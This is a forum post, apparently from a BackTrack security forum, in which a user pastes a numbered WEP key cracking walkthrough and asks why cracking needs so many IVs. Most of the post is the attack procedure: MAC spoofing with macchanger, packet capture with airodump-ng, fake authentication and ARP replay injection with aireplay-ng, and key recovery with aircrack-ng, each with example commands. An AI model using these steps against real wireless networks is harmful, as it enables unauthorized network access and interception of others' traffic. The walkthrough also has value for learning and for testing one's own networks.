
Originally Posted by
Pureline
Glad to be of service mate,
You want to learn to use Autoscan and Nmap (and alike tools) for gathering information on live hosts next.
I spoke too soon. I am unable to replicate the successful penetration test.
I have been working on this for 3 days with no luck.
Code:
How to test a WEP network for key vulnerability....
Get the key for the WEP network.....
0: Find your wireless device....
USAGE -- iwconfig MY_WIRELESS_DEVICE
EXAMPLE OF DEVICE NAMES -- rausb0 OR ath0
EXAMPLE -- iwconfig rausb0
1: Stop your wireless device to allow MAC address change.
USAGE -- airmon-ng stop MY_WIRELESS_DEVICE
EXAMPLE -- airmon-ng stop rausb0
2: Set a fake MAC address for your wireless device (use something easy to remember like 00:11:22:33:44:55)
USAGE -- macchanger --mac FAKE_MAC_ADDRESS MY_WIRELESS_DEVICE
EXAMPLE -- macchanger --mac 00:11:22:33:44:55 rausb0
3: Re-start your wireless device in monitor mode - check with iwconfig - run second time if needed
USAGE -- airmon-ng start MY_WIRELESS_DEVICE
EXAMPLE -- airmon-ng start rausb0
6: Start airodump-ng to find the network (BSSID, channel and encryption protocol) that you want to test.
UASAGE -- airodump-ng MY_WIRELESS_DEVICE
EXAMPLE -- airodump-ng rausb0
7: Stop airodump and copy the target network's BSSID
USAGE -- {ctrl-c stops airodump-ng then highlight, right click and click copy on the data}
EXAMPLE OF BSSID TO COPY -- 00:14:6C:DE:D1:A8
8: Save your IV data to a file. This data is used to figure out the WEP key.
USAGE -- airodump-ng -c TARGET_CHANNEL_# -w NEW_DATA_FILENAME --bssid TARGET_BSSID WIRELESS_DEVICE
EXAMPLE -- airodump-ng -c 9 -w testingwep --bssid 00:14:6C:DE:D1:A8 rausb0
9: In seperate shell window - fake authentication on the target network.
USAGE -- aireplay-ng -1 0 -a TARGET_BSSID -h MY_FAKED_MAC_ADDRESS
EXAMPLE -- aireplay-ng -1 0 -a 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55
10: Make ARP requests to target to generate traffic.
USAGE -- aireplay-ng -3 -b TARGET_BSSID -h MY_FAKED_MAC_ADDRESS rausb0
EXAMPLE -- aireplay-ng -3 -b 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0
11: In seperate shell window - crack the WEP key (your data filename from step 8 will have a # and ".cap added to it's end).
USAGE -- aircrack-ng -a 1 -b TARGET_BSSID NEW_DATA_FILENAME
EXAMPLE -- aircrack-ng -a 1 -b 00:14:6C:DE:D1:A8 testingwep-01.cap
-- Look for "KEY FOUND! [ WEP_KEY ]" in the output.
-- EXAMPLE OUTPUT : "KEY FOUND! [ B4:58:2C:DB:41:2B:D1:BB:00:84:9F:4A:57 ]"
I just can't get a WEP key before something like 1.5 million IVs.
Are there updates to the BT3 beta that I should be installing?
See anything I'm screwing up?